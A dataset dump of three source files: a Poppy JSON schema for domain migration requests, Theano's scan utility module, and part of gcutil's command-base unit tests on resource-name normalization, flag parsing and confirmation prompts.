repo_name: string (5–92 chars) | path: string (4–232 chars) | copies: string (19 classes) | size: string (4–7 chars) | content: string (721–1.04M chars) | license: string (15 classes) | hash: int64 | line_mean: float64 (6.51–99.9) | line_max: int64 (15–997) | alpha_frac: float64 (0.25–0.97) | autogenerated: bool (1 class)
---|---|---|---|---|---|---|---|---|---|---|
obulpathi/poppy | poppy/transport/validators/schemas/domain_migration.py | 1 | 1645 |
# Copyright (c) 2015 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from poppy.transport.validators import schema_base
class DomainMigrationServiceSchema(schema_base.SchemaBase):
    '''JSON Schema validation for /admin/provider/akamai/service'''
schema = {
'domain_migration': {
'POST': {
'type': 'object',
'additionalProperties': False,
'properties': {
'project_id': {
'type': 'string',
'required': True
},
'service_id': {
'type': 'string',
'required': True
},
'domain_name': {
'type': 'string',
'required': True,
'minLength': 3,
'maxLength': 253
},
'new_cert': {
'type': 'string',
'required': True
}
}
}
}
}
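# Illustrative note (not part of the original file): a request body such as
# {"project_id": "12345", "service_id": "abc-123", "domain_name": "www.example.com",
#  "new_cert": "san1.example.net"} would satisfy the schema above (all values are
# made-up examples); omitting any of the four required keys, or adding an extra
# key, fails validation because additionalProperties is False.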
| apache-2.0 | 2,526,395,158,402,833,400 | 31.9 | 69 | 0.488754 | false |
nke001/attention-lvcsr | libs/Theano/theano/sandbox/scan_module/scan_utils.py | 1 | 16116 |
"""
This module provides utility functions for the Scan Op
See scan.py for details on scan
"""
from __future__ import print_function
__docformat__ = 'restructuredtext en'
__authors__ = ("Razvan Pascanu "
"Frederic Bastien "
"James Bergstra "
"Pascal Lamblin "
"Arnaud Bergeron")
__copyright__ = "(c) 2010, Universite de Montreal"
__contact__ = "Razvan Pascanu <r.pascanu@gmail>"
import copy
import logging
import warnings
import numpy
from six.moves import xrange
import theano
from theano.compat import izip
from theano.compile.pfunc import rebuild_collect_shared
from theano import gof
from theano import tensor, scalar
from theano.tensor.basic import get_scalar_constant_value
# Logging function for sending warning or info
_logger = logging.getLogger('theano.scan_utils')
def expand(tensor_var, size):
"""
Given ``tensor_var``, a Theano tensor of shape (d1, d2, ..), this
function constructs a rval Theano tensor of shape (d1 + size, d2, ..)
filled with 0s, except the first d1 entries which are taken from
``tensor_var``, namely:
rval[:d1] = tensor_var
:param tensor_var: Theano tensor variable
:param size: int
"""
# Corner case that I might use in an optimization
if size == 0:
return tensor_var
shapes = [tensor_var.shape[x] for x in xrange(tensor_var.ndim)]
zeros_shape = [size + shapes[0]] + shapes[1:]
empty = tensor.zeros(zeros_shape,
dtype=tensor_var.dtype)
return tensor.set_subtensor(empty[:shapes[0]], tensor_var)
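# Illustrative sketch (not part of the original module; variable names are made
# up for the example): expanding a length-3 vector by 2 pads it with zeros.
#
#   x = tensor.vector('x')
#   f = theano.function([x], expand(x, 2))
#   f(numpy.asarray([1., 2., 3.], dtype=theano.config.floatX))
#   # -> array([ 1.,  2.,  3.,  0.,  0.])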
def to_list(ls):
"""
Converts ``ls`` to list if it is a tuple, or wraps ``ls`` into a list if
it is not a list already
"""
if isinstance(ls, (list, tuple)):
return list(ls)
else:
return [ls]
class until(object):
"""
Theano can end on a condition. In order to differentiate this condition
from the other outputs of scan, this class is used to wrap the condition
around it.
"""
def __init__(self, condition):
self.condition = tensor.as_tensor_variable(condition)
assert self.condition.ndim == 0
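# Illustrative sketch (not part of the original module): a step function handed
# to scan can stop the loop early by returning an ``until`` instance after its
# outputs (names below are made up for the example).
#
#   def step(x_t, acc):
#       new_acc = acc + x_t
#       return new_acc, until(new_acc > 100)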
def get_updates_and_outputs(ls):
"""
Parses the list ``ls`` into outputs and updates. The semantics
of ``ls`` is defined by the constructive function of scan.
    The elements of ``ls`` are either a list of expressions representing the
outputs/states, a dictionary of updates or a condition.
"""
def is_list_outputs(elem):
if (isinstance(elem, (list, tuple)) and
all([isinstance(x, theano.Variable) for x in elem])):
return True
if isinstance(elem, theano.Variable):
return True
return False
def is_updates(elem):
if isinstance(elem, dict):
return True
# Dictionaries can be given as lists of tuples
if (isinstance(elem, (list, tuple)) and
all([isinstance(x, (list, tuple)) and len(x) == 2
for x in elem])):
return True
return False
def is_condition(elem):
return isinstance(elem, until)
if is_list_outputs(ls):
return None, to_list(ls), {}
if is_updates(ls):
return None, [], dict(ls)
if not isinstance(ls, (list, tuple)):
raise ValueError(('Scan can not parse the return value'
' of your constructive function given to scan'))
ls = list(ls)
deprecation_msg = ('The return value of the lambda function'
                       ' has been restricted. You have to always return first the'
' outputs (if any), afterwards the updates (if any) and'
' at the end the condition')
error_msg = ('Scan can not parse the return value of your constructive '
                 'function given to scan')
if len(ls) == 2:
if is_list_outputs(ls[0]):
if is_updates(ls[1]):
return (None, to_list(ls[0]), dict(ls[1]))
elif is_condition(ls[1]):
return (ls[1].condition, to_list(ls[0]), {})
else:
raise ValueError(error_msg)
elif is_updates(ls[0]):
            if is_list_outputs(ls[1]):
raise ValueError(deprecation_msg)
elif is_condition(ls[1]):
return (ls[1].condition, [], dict(ls[0]))
else:
raise ValueError(error_msg)
else:
raise ValueError(error_msg)
elif len(ls) == 3:
        if is_list_outputs(ls[0]):
if is_updates(ls[1]):
if is_condition(ls[2]):
return (ls[2].condition, to_list(ls[0]), dict(ls[1]))
else:
raise ValueError(error_msg)
else:
raise ValueError(error_msg)
else:
raise ValueError(error_msg)
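# Illustrative note (not part of the original module): the result is always a
# (condition, outputs, updates) triple.  Assuming ``o`` is a Theano variable,
# ``u`` a dictionary of updates and ``c = until(cond)``:
#   get_updates_and_outputs(o)         -> (None, [o], {})
#   get_updates_and_outputs((o, u))    -> (None, [o], dict(u))
#   get_updates_and_outputs((o, u, c)) -> (c.condition, [o], dict(u))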
def clone(output, replace=None, strict=True, share_inputs=True):
"""
Function that allows replacing subgraphs of a computational
graph. It returns a copy of the initial subgraph with the corresponding
substitutions.
:type output: Theano Variables (or Theano expressions)
:param outputs: Theano expression that represents the computational
graph
:type replace: dict
:param replace: dictionary describing which subgraphs should be
replaced by what
:type share_inputs: bool
:param share_inputs: If True, use the same inputs (and shared variables)
as the original graph. If False, clone them. Note that cloned
shared variables still use the same underlying storage, so they
will always have the same value.
"""
inps, outs, other_stuff = rebuild_collect_shared(output,
[],
replace,
[],
strict,
share_inputs)
return outs
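# Illustrative sketch (not part of the original module; names are made up):
# substitute one input of an existing graph for another without rebuilding it.
#
#   x = tensor.scalar('x')
#   y = x ** 2 + 1
#   z = tensor.scalar('z')
#   y_of_z = clone(y, replace={x: z})   # same expression computed from z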
def canonical_arguments(sequences,
outputs_info,
non_sequences,
go_backwards,
n_steps):
"""
This re-writes the arguments obtained from scan into a more friendly
form for the scan_op.
Mainly it makes sure that arguments are given as lists of dictionaries,
    and that the different fields of a dictionary are set to default
    values if the user has not provided any.
"""
states_info = to_list(outputs_info)
parameters = [tensor.as_tensor_variable(x) for x in to_list(non_sequences)]
inputs = []
if n_steps is not None:
negative_n_steps = tensor.lt(tensor.as_tensor_variable(n_steps), 0)
for input in to_list(sequences):
if not isinstance(input, dict):
nw_input = tensor.as_tensor_variable(input)
if go_backwards:
nw_input = nw_input[::-1]
if n_steps is not None:
nw_input = tensor.switch(negative_n_steps, nw_input[::-1],
nw_input)
inputs.append(tensor.as_tensor_variable(nw_input))
elif input.get('taps', True) is None:
nw_input = tensor.as_tensor_variable(input['input'])
if go_backwards:
nw_input = nw_input[::-1]
if n_steps is not None:
nw_input = tensor.switch(negative_n_steps, nw_input[::-1],
nw_input)
inputs.append(nw_input)
elif input.get('taps', None):
mintap = numpy.min(input['taps'])
maxtap = numpy.max(input['taps'])
orig_input = tensor.as_tensor_variable(input['input'])
if go_backwards:
orig_input = orig_input[::-1]
if n_steps is not None:
orig_input = tensor.switch(negative_n_steps, orig_input[::-1],
orig_input)
for k in input['taps']:
                # We cut the sequence so that seq[i] corresponds to
                # seq[i-k]
if maxtap < 0:
offset_max = abs(maxtap)
else:
offset_max = 0
if mintap < 0:
offset_min = abs(mintap)
else:
offset_min = 0
nw_input = orig_input
if maxtap == mintap and maxtap != 0:
if maxtap > 0:
nw_input = nw_input[maxtap:]
else:
nw_input = nw_input[:maxtap]
else:
st = k + offset_min
if maxtap > 0:
ed = - (maxtap + offset_min - st)
else:
ed = - (offset_min - st)
if ed != 0:
nw_input = nw_input[st:ed]
else:
nw_input = nw_input[st:]
inputs.append(nw_input)
else:
raise ValueError('Provided sequence makes no sense', str(input))
# Since we've added all sequences now we need to level them up based on
# n_steps or their different shapes
if n_steps is None:
if len(inputs) == 0:
# No information about the number of steps
raise ValueError('You need to provide either at least '
'one sequence over which scan should loop '
'or a number of steps for scan to loop. '
                             'Neither of the two has been provided!')
T = inputs[0].shape[0]
for input in inputs[1:]:
T = tensor.minimum(T, input.shape[0])
else:
T = abs(tensor.as_tensor(n_steps))
# Level up sequences
inputs = [input[:T] for input in inputs]
# wrap outputs info in a dictionary if they are not already in one
for i, state in enumerate(states_info):
if state is not None and not isinstance(state, dict):
states_info[i] = dict(initial=tensor.as_tensor_variable(state),
taps=[-1])
elif isinstance(state, dict):
if not state.get('initial', None) and state.get('taps', None):
raise ValueError(('If you are using slices of an output '
                                  'you need to provide an initial state '
'for it'), state)
elif state.get('initial', None) and not state.get('taps', None):
# initial state but taps not provided
if 'taps' in state:
# explicitly provided a None for taps
_logger.warning(
                    ('Output %s (index %d) has an initial '
'state but taps is explicitly set to None '),
getattr(states_info[i]['initial'], 'name', 'None'), i)
states_info[i]['taps'] = [-1]
states_info[i]['initial'] = \
tensor.as_tensor_variable(state['initial'])
elif state.get('initial', None):
states_info[i]['initial'] = \
tensor.as_tensor_variable(state['initial'])
else:
# if a None is provided as the output info we replace it
# with an empty dict() to simplify handling
states_info[i] = dict()
return inputs, states_info, parameters, T
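# Illustrative note (not part of the original module): for a call like
# canonical_arguments(sequences=x, outputs_info=y0, non_sequences=w,
# go_backwards=False, n_steps=None), with x a matrix and y0 a vector (made-up
# names), the result is roughly ([x[:T]], [{'initial': y0, 'taps': [-1]}],
# [w], T) where T is x.shape[0].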
def infer_shape(outs, inputs, input_shapes):
'''
Compute the shape of the outputs given the shape of the inputs
of a theano graph.
We do it this way to avoid compiling the inner function just to get
the shape. Changes to ShapeFeature could require changes in this function.
'''
# We use a ShapeFeature because it has all the necessary logic
# inside. We don't use the full ShapeFeature interface, but we
# let it initialize itself with an empty fgraph, otherwise we will
# need to do it manually
for inp, inp_shp in izip(inputs, input_shapes):
if inp_shp is not None and len(inp_shp) != inp.ndim:
assert len(inp_shp) == inp.ndim
shape_feature = tensor.opt.ShapeFeature()
shape_feature.on_attach(theano.gof.FunctionGraph([], []))
# Initialize shape_of with the input shapes
for inp, inp_shp in izip(inputs, input_shapes):
shape_feature.set_shape(inp, inp_shp)
def local_traverse(out):
'''
Go back in the graph, from out, adding computable shapes to shape_of.
'''
if out in shape_feature.shape_of:
# Its shape is already known
return
elif out.owner is None:
# This is an input of the graph
shape_feature.init_r(out)
else:
# Recurse over inputs
for inp in out.owner.inputs:
if not inp in shape_feature.shape_of:
local_traverse(inp)
# shape_feature.on_import does not actually use an fgraph
# It will call infer_shape and set_shape appropriately
dummy_fgraph = None
shape_feature.on_import(dummy_fgraph, out.owner, reason="dummy")
ret = []
for o in outs:
local_traverse(o)
ret.append(shape_feature.shape_of[o])
return ret
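# Illustrative sketch (not part of the original module; names are made up):
# obtain a symbolic output shape without compiling the inner graph.
#
#   x = tensor.matrix('x')
#   y = x.T
#   rows, cols = infer_shape([y], [x], [(x.shape[0], x.shape[1])])[0]
#   # rows/cols are symbolic expressions equal to x.shape[1] and x.shape[0]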
def allocate_memory(T, y_info, y):
"""
Allocates memory for an output of scan.
:param T: scalar
Variable representing the number of steps scan will run
:param y_info: dict
Dictionary describing the output (more specifically describing shape
information for the output
:param y: Tensor variable
Expression describing the computation resulting in out entry of y.
It can be used to infer the shape of y
"""
if 'shape' in y_info:
return tensor.zeros([T, ] + list(y_info['shape']),
dtype=y.dtype)
else:
inputs = gof.graph.inputs([y])
ins_shapes = []
for inp in inputs:
in_shape = [inp.shape[k] for k in xrange(inp.ndim)]
ins_shapes.append(in_shape)
shape = infer_shape([y], inputs, ins_shapes)[0]
return tensor.zeros([T, ] + shape, dtype=y.dtype)
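# Illustrative note (not part of the original module): allocate_memory(T, {}, y)
# infers the per-step shape of ``y`` from its inputs and returns zeros of shape
# [T] + shape(y); passing y_info={'shape': (5,)} skips the inference and simply
# returns tensor.zeros([T, 5], dtype=y.dtype).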
class ScanPermutation(gof.Op):
def __init__(self, mintap=0, inplace=False):
self.inplace = inplace
self.mintap = mintap
if inplace:
self.destroy_map = {0: [0]}
def __eq__(self, other):
return type(self) == type(other) and self.inplace == other.inplace
def __hash__(self):
return hash(type(self)) ^ hash(self.inplace)
def __str__(self):
if self.inplace:
return "scan_permutation{inplace}"
else:
return "scan_permutation"
def make_node(self, membuffer, index):
# index has to be a scalar
assert index.ndim == 0
        # we need at least one dimension
assert membuffer.ndim > 0
return gof.Apply(self, [membuffer, index], [membuffer.type()])
def perform(self, node, inputs, outputs):
membuffer = inputs[0]
index = inputs[1] + self.mintap
out = outputs[0]
if index % membuffer.shape[0] == 0:
if self.inplace:
out[0] = membuffer
else:
out[0] = membuffer.copy()
else:
pos = index % membuffer.shape[0]
if outputs[0] is membuffer:
membuffer = membuffer.copy()
print(pos)
out[0][:membuffer.shape[0] - pos] = membuffer[pos:]
out[0][membuffer.shape[0] - pos:] = membuffer[:pos]
def R_op(self, inputs, eval_points):
if eval_points[0] is None:
return [None]
return self.make_node(eval_points[0], inputs[1]).outputs
def grad(self, inputs, grads):
pos = inputs[0].shape[0] - (inputs[1] % inputs[0].shape[0])
return self.make_node(grads[0], pos).outputs
| mit | 8,171,401,141,584,045,000 | 36.2194 | 79 | 0.548089 | false |
palladius/gcloud | packages/gcutil-1.7.1/lib/google_compute_engine/gcutil/command_base_test.py | 1 | 58035 |
#!/usr/bin/python
#
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for the base command classes."""
from __future__ import with_statement
import path_initializer
path_initializer.InitializeSysPath()
import copy
import datetime
import os
import sys
import tempfile
from google.apputils import app
import gflags as flags
import unittest
from gcutil import command_base
from gcutil import gcutil_logging
from gcutil import mock_api
FLAGS = flags.FLAGS
class CommandBaseTest(unittest.TestCase):
class ListMockCommandBase(command_base.GoogleComputeListCommand):
"""A list mock command that specifies no default sort field."""
summary_fields = (('name', 'id'),
('id', 'number'),
('description', 'description'))
def __init__(self, name, flag_values):
super(CommandBaseTest.ListMockCommandBase, self).__init__(
name, flag_values)
def SetApi(self, api):
pass
def ListFunc(self):
def Func(project=None, maxResults=None, filter=None, pageToken=None):
return mock_api.MockRequest(
{'items': [{'description': 'Object C',
'id': 'projects/user/objects/my-object-c',
'kind': 'cloud#object',
'number': 123},
{'description': 'Object A',
'id': 'projects/user/objects/my-object-a',
'kind': 'cloud#object',
'number': 789},
{'description': 'Object B',
'id': 'projects/user/objects/my-object-b',
'kind': 'cloud#object',
'number': 456},
{'description': 'Object D',
'id': 'projects/user/objects/my-object-d',
'kind': 'cloud#object',
'number': 999}],
'kind': 'cloud#objectList'})
return Func
class ListMockCommand(ListMockCommandBase):
"""A list mock command that specifies a default sort field."""
default_sort_field = 'name'
def __init__(self, name, flag_values):
super(CommandBaseTest.ListMockCommand, self).__init__(name, flag_values)
class MockDetailCommand(command_base.GoogleComputeCommand):
detail_fields = (('name', 'id'),
('id', 'number'),
('description', 'description'),
('additional', 'moreStuff'))
def __init__(self, name, flag_values):
super(CommandBaseTest.MockDetailCommand, self).__init__(name, flag_values)
def SetApi(self, api):
pass
def Handle(self):
return {'description': 'Object C',
'id': 'projects/user/objects/my-object-c',
'kind': 'cloud#object',
'number': 123,
'moreStuff': 'foo'}
class MockSafetyCommand(command_base.GoogleComputeCommand):
safety_prompt = 'Take scary action'
def __init__(self, name, flag_values):
super(CommandBaseTest.MockSafetyCommand, self).__init__(name, flag_values)
def SetApi(self, api):
pass
def Handle(self):
pass
class MockSafetyCommandWithArgs(MockSafetyCommand):
safety_prompt = 'Act on'
def Handle(self, argument, arg2):
pass
class FakeExit(object):
"""A fake version of exit to capture exit status."""
def __init__(self):
self.__status__ = []
def __call__(self, value):
self.__status__.append(value)
def GetStatuses(self):
return self.__status__
class CaptureOutput(object):
def __init__(self):
self._capture_text = ''
# Purposefully name this 'write' to mock an output stream
# pylint: disable-msg=C6409
def write(self, text):
self._capture_text += text
# Purposefully name this 'flush' to mock an output stream
# pylint: disable-msg=C6409
def flush(self):
pass
def GetCapturedText(self):
return self._capture_text
class MockInput(object):
def __init__(self, input_string):
self._input_string = input_string
# Purposefully name this 'readline' to mock an input stream
# pylint: disable-msg=C6409
def readline(self):
return self._input_string
def ClearLogger(self):
for h in gcutil_logging.LOGGER.handlers:
gcutil_logging.LOGGER.removeHandler(h)
def test_PresentElement(self):
class MockCommand(command_base.GoogleComputeCommand):
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
flag_values = copy.deepcopy(FLAGS)
command = MockCommand('mock_command', flag_values)
flag_values.project = 'user'
flag_values.service_version = 'v1beta13'
command.SetFlags(flag_values)
self.assertEqual(
'user',
command._PresentElement('https://www.googleapis.com/compute/v1/'
'projects/user'))
self.assertEqual(
'user',
command._PresentElement('https://www.googleapis.com/compute/v1/'
'projects/user/'))
self.assertEqual('user', command._PresentElement('projects/user'))
self.assertEqual('user', command._PresentElement('projects/user/'))
self.assertEqual(
'standard-2-cpu',
command._PresentElement('https://www.googleapis.com/compute/v1/'
'projects/user/machine-types/standard-2-cpu'))
self.assertEqual(
'standard-2-cpu',
command._PresentElement('https://www.googleapis.com/compute/v1/'
'projects/user/machine-types/standard-2-cpu/'))
self.assertEqual(
'standard-2-cpu',
command._PresentElement('projects/user/machine-types/standard-2-cpu'))
self.assertEqual(
'standard-2-cpu',
command._PresentElement('projects/user/machine-types/standard-2-cpu/'))
self.assertEqual(
'foo/bar/baz',
command._PresentElement('https://www.googleapis.com/compute/v1/'
'projects/user/shared-fate-zones/foo/bar/baz'))
self.assertEqual(
'foo/bar/baz',
command._PresentElement('projects/user/shared-fate-zones/foo/bar/baz'))
self.assertEqual('foo/bar/baz', command._PresentElement('foo/bar/baz'))
# Tests eliding feature
test_str = ('I am the very model of a modern Major-General. I\'ve '
'information vegetable, animal, and mineral. I know the kings '
'of England and quote the fights historical; from Marathon to '
'Waterloo in order categorical.')
self.assertEqual(
'I am the very model of a modern.. Waterloo in order categorical.',
command._PresentElement(test_str))
flag_values.long_values_display_format = 'full'
command.SetFlags(flag_values)
self.assertEqual(test_str, command._PresentElement(test_str))
def testDenormalizeProjectName(self):
denormalize = command_base.GoogleComputeCommand.DenormalizeProjectName
flag_values = flags.FlagValues()
flags.DEFINE_string('project',
None,
'Project Name',
flag_values=flag_values)
flags.DEFINE_string('project_id',
None,
'Obsolete Project Name',
flag_values=flag_values)
self.assertRaises(command_base.CommandError,
denormalize,
flag_values)
flag_values.project = 'project_collection/google'
self.assertRaises(command_base.CommandError,
denormalize,
flag_values)
flag_values.project = 'projects/google'
denormalize(flag_values)
self.assertEqual(flag_values.project, 'google')
denormalize(flag_values)
self.assertEqual(flag_values.project, 'google')
flag_values.project = '/google'
denormalize(flag_values)
self.assertEqual(flag_values.project, 'google')
flag_values.project = 'google/'
denormalize(flag_values)
self.assertEqual(flag_values.project, 'google')
flag_values.project = '/google/'
denormalize(flag_values)
self.assertEqual(flag_values.project, 'google')
flag_values.project = '/projects/google'
denormalize(flag_values)
self.assertEqual(flag_values.project, 'google')
flag_values.project = 'projects/google/'
denormalize(flag_values)
self.assertEqual(flag_values.project, 'google')
flag_values.project = '/projects/google/'
denormalize(flag_values)
self.assertEqual(flag_values.project, 'google')
flag_values.project_id = 'my-obsolete-project-1'
flag_values.project = 'my-new-project-1'
denormalize(flag_values)
self.assertEqual(flag_values.project, 'my-new-project-1')
self.assertEqual(flag_values.project_id, None)
flag_values.project_id = 'my-new-project-2'
flag_values.project = None
denormalize(flag_values)
self.assertEqual(flag_values.project, 'my-new-project-2')
self.assertEqual(flag_values.project_id, None)
flag_values.project_id = 'MyUppercaseProject-1'
flag_values.project = None
self.assertRaises(command_base.CommandError, denormalize, flag_values)
flag_values.project = 'MyUppercaseProject-2'
flag_values.project_id = None
self.assertRaises(command_base.CommandError, denormalize, flag_values)
def testDenormalizeResourceName(self):
denormalize = command_base.GoogleComputeCommand.DenormalizeResourceName
self.assertEqual('dual-cpu',
denormalize('projects/google/machine_types/dual-cpu'))
self.assertEqual('dual-cpu',
denormalize('/projects/google/machine_types/dual-cpu'))
self.assertEqual('dual-cpu',
denormalize('projects/google/machine_types/dual-cpu/'))
self.assertEqual('dual-cpu',
denormalize('/projects/google/machine_types/dual-cpu/'))
self.assertEqual('dual-cpu',
denormalize('//projects/google/machine_types/dual-cpu//'))
self.assertEqual('dual-cpu',
denormalize('dual-cpu'))
self.assertEqual('dual-cpu',
denormalize('/dual-cpu'))
self.assertEqual('dual-cpu',
denormalize('dual-cpu/'))
self.assertEqual('dual-cpu',
denormalize('/dual-cpu/'))
def _DoTestNormalizeResourceName(self, service_version):
class MockCommand(command_base.GoogleComputeCommand):
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'google'
flag_values.service_version = service_version
command = MockCommand('mock_command', flag_values)
command.SetFlags(flag_values)
prefix = 'https://www.googleapis.com/compute/%s' % service_version
expected = '%s/projects/google/machine_types/dual-cpu' % prefix
self.assertEqual(
expected,
command.NormalizeResourceName('google', None, 'machine_types',
'dual-cpu'))
self.assertEqual(
expected,
command.NormalizeResourceName('google', None, 'machine_types',
'/dual-cpu'))
self.assertEqual(
expected,
command.NormalizeResourceName('google', None, 'machine_types',
'dual-cpu/'))
self.assertEqual(
expected,
command.NormalizeResourceName('google', None, 'machine_types',
'/dual-cpu/'))
self.assertEqual(
expected,
command.NormalizeResourceName(
'google',
None,
'machine_types',
'projects/google/machine_types/dual-cpu'))
self.assertEqual(
expected,
command.NormalizeResourceName(
'google',
None,
'machine_types',
'/projects/google/machine_types/dual-cpu'))
self.assertEqual(
expected,
command.NormalizeResourceName(
'google',
None,
'machine_types',
'projects/google/machine_types/dual-cpu/'))
self.assertEqual(
expected,
command.NormalizeResourceName(
'google',
None,
'machine_types',
'/projects/google/machine_types/dual-cpu/'))
self.assertEqual(
'%s/projects/google/kernels/default' % prefix,
command.NormalizeResourceName(
'my-project',
None,
'kernels',
'projects/google/kernels/default'))
def testNormalizeResourceName(self):
for version in command_base.SUPPORTED_VERSIONS:
self._DoTestNormalizeResourceName(version)
def testNormalizeScopedResourceName(self):
class MockCommand(command_base.GoogleComputeCommand):
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'my-project'
command = MockCommand('mock_command', flag_values)
command.SetFlags(flag_values)
# Validate scope is ignored downlevel
flag_values.service_version = 'v1beta13'
prefix = 'https://www.googleapis.com/compute/v1beta13'
expected = '%s/projects/my-project/objects/foo-bar' % prefix
self.assertEqual(
expected,
command.NormalizeResourceName('my-project', 'scope', 'objects',
'foo-bar'))
# Validate scope is expected in v1beta14 and above
flag_values.service_version = 'v1beta14'
prefix = 'https://www.googleapis.com/compute/v1beta14'
expected = '%s/projects/my-project/scope/objects/foo-bar' % prefix
self.assertEqual(
expected,
command.NormalizeResourceName('my-project', 'scope', 'objects',
'foo-bar'))
# Validate helper wrappers
expected = '%s/projects/my-project/objects/foo-bar' % prefix
self.assertEqual(
expected,
command.NormalizeTopLevelResourceName('my-project', 'objects',
'foo-bar'))
expected = '%s/projects/my-project/global/objects/foo-bar' % prefix
self.assertEqual(
expected,
command.NormalizeGlobalResourceName('my-project', 'objects',
'foo-bar'))
expected = '%s/projects/my-project/zones/zone-a/objects/foo-bar' % prefix
self.assertEqual(
expected,
command.NormalizePerZoneResourceName('my-project', 'zone-a', 'objects',
'foo-bar'))
def testFlattenToDict(self):
class TestClass(command_base.GoogleComputeCommand):
fields = (('name', 'id'),
('simple', 'path.to.object'),
('multiple', 'more.elements'),
('multiple', 'even_more.elements'),
('repeated', 'things'),
('long', 'l'),
('does not exist', 'dne'),
('partial match', 'path.to.nowhere'),
)
data = {'id': ('https://www.googleapis.com/compute/v1beta1/' +
'projects/test/object/foo'),
'path': {'to': {'object': 'bar'}},
'more': [{'elements': 'a'}, {'elements': 'b'}],
'even_more': [{'elements': 800}, {'elements': 800}],
'things': [1, 2, 3],
'l': 'n' * 80}
expected_result = ['foo', 'bar', 'a,b', '800,800', '1,2,3',
'%s..%s' % ('n' * 31, 'n' * 31), '', '']
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'test'
test_class = TestClass('foo', flag_values)
test_class.SetFlags(flag_values)
flattened = test_class._FlattenObjectToList(data, test_class.fields)
self.assertEquals(flattened, expected_result)
def testFlattenToDictWithMultipleTargets(self):
class TestClass(command_base.GoogleComputeCommand):
fields = (('name', ('name', 'id')),
('simple', ('path.to.object', 'foo')),
('multiple', 'more.elements'),
('multiple', 'even_more.elements'),
('repeated', 'things'),
('long', ('l', 'longer')),
('does not exist', 'dne'),
('partial match', 'path.to.nowhere'),
)
data = {'name': ('https://www.googleapis.com/compute/v1beta1/' +
'projects/test/object/foo'),
'path': {'to': {'object': 'bar'}},
'more': [{'elements': 'a'}, {'elements': 'b'}],
'even_more': [{'elements': 800}, {'elements': 800}],
'things': [1, 2, 3],
'longer': 'n' * 80}
expected_result = ['foo', 'bar', 'a,b', '800,800', '1,2,3',
'%s..%s' % ('n' * 31, 'n' * 31), '', '']
flag_values = copy.deepcopy(FLAGS)
flag_values.project = 'test'
test_class = TestClass('foo', flag_values)
test_class.SetFlags(flag_values)
flattened = test_class._FlattenObjectToList(data, test_class.fields)
self.assertEquals(flattened, expected_result)
def testPositionArgumentParsing(self):
class MockCommand(command_base.GoogleComputeCommand):
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
flags.DEFINE_string('mockflag',
'wrong_mock_flag',
'Mock Flag',
flag_values=flag_values)
def Handle(self, arg1, arg2, arg3):
pass
flag_values = copy.deepcopy(FLAGS)
command = MockCommand('mock_command', flag_values)
expected_arg1 = 'foo'
expected_arg2 = 'bar'
expected_arg3 = 'baz'
expected_flagvalue = 'wow'
command_line = ['mock_command', expected_arg1, expected_arg2,
expected_arg3, '--mockflag=' + expected_flagvalue]
# Verify the positional argument parser correctly identifies the parameters
# and flags.
result = command._ParseArgumentsAndFlags(flag_values, command_line)
self.assertEqual(result[0], expected_arg1)
self.assertEqual(result[1], expected_arg2)
self.assertEqual(result[2], expected_arg3)
self.assertEqual(flag_values.mockflag, expected_flagvalue)
def testErroneousKeyWordArgumentParsing(self):
class MockCommand(command_base.GoogleComputeCommand):
def __init__(self, name, flag_values):
super(MockCommand, self).__init__(name, flag_values)
flags.DEFINE_integer('mockflag',
10,
'Mock Flag',
flag_values=flag_values,
lower_bound=0)
def Handle(self, arg1, arg2, arg3):
pass
flag_values = copy.deepcopy(FLAGS)
command = MockCommand('mock_command', flag_values)
    # Ensures that a type mismatch for a keyword argument causes a
# CommandError to be raised.
bad_values = [-100, -2, 0.2, .30, 100.1]
for val in bad_values:
command_line = ['mock_command', '--mockflag=%s' % val]
self.assertRaises(command_base.CommandError,
command._ParseArgumentsAndFlags,
flag_values, command_line)
# Ensures that passing a nonexistent keyword argument also causes
# a CommandError to be raised.
command_line = ['mock_command', '--nonexistent_flag=boo!']
self.assertRaises(command_base.CommandError,
command._ParseArgumentsAndFlags,
flag_values, command_line)
def testSafetyPromptYes(self):
flag_values = copy.deepcopy(FLAGS)
command_line = ['mock_command']
command = CommandBaseTest.MockSafetyCommand('mock_command', flag_values)
args = command._ParseArgumentsAndFlags(flag_values, command_line)
command.SetFlags(flag_values)
mock_output = mock_api.MockOutput()
mock_input = mock_api.MockInput('Y\n\r')
oldin = sys.stdin
sys.stdin = mock_input
oldout = sys.stdout
sys.stdout = mock_output
result = command._HandleSafetyPrompt(args)
self.assertEqual(mock_output.GetCapturedText(),
'Take scary action? [y/N]\n>>> ')
self.assertEqual(result, True)
sys.stdin = oldin
sys.stdout = oldout
def testSafetyPromptWithArgsYes(self):
flag_values = copy.deepcopy(FLAGS)
command_line = ['mock_cmd', 'arg1', 'arg2']
command = CommandBaseTest.MockSafetyCommandWithArgs('mock_cmd', flag_values)
args = command._ParseArgumentsAndFlags(flag_values, command_line)
command.SetFlags(flag_values)
mock_output = CommandBaseTest.CaptureOutput()
mock_input = CommandBaseTest.MockInput('Y\n\r')
oldin = sys.stdin
sys.stdin = mock_input
oldout = sys.stdout
sys.stdout = mock_output
result = command._HandleSafetyPrompt(args)
self.assertEqual(mock_output.GetCapturedText(),
'Act on arg1, arg2? [y/N]\n>>> ')
self.assertEqual(result, True)
sys.stdin = oldin
sys.stdout = oldout
def testSafetyPromptMissingArgs(self):
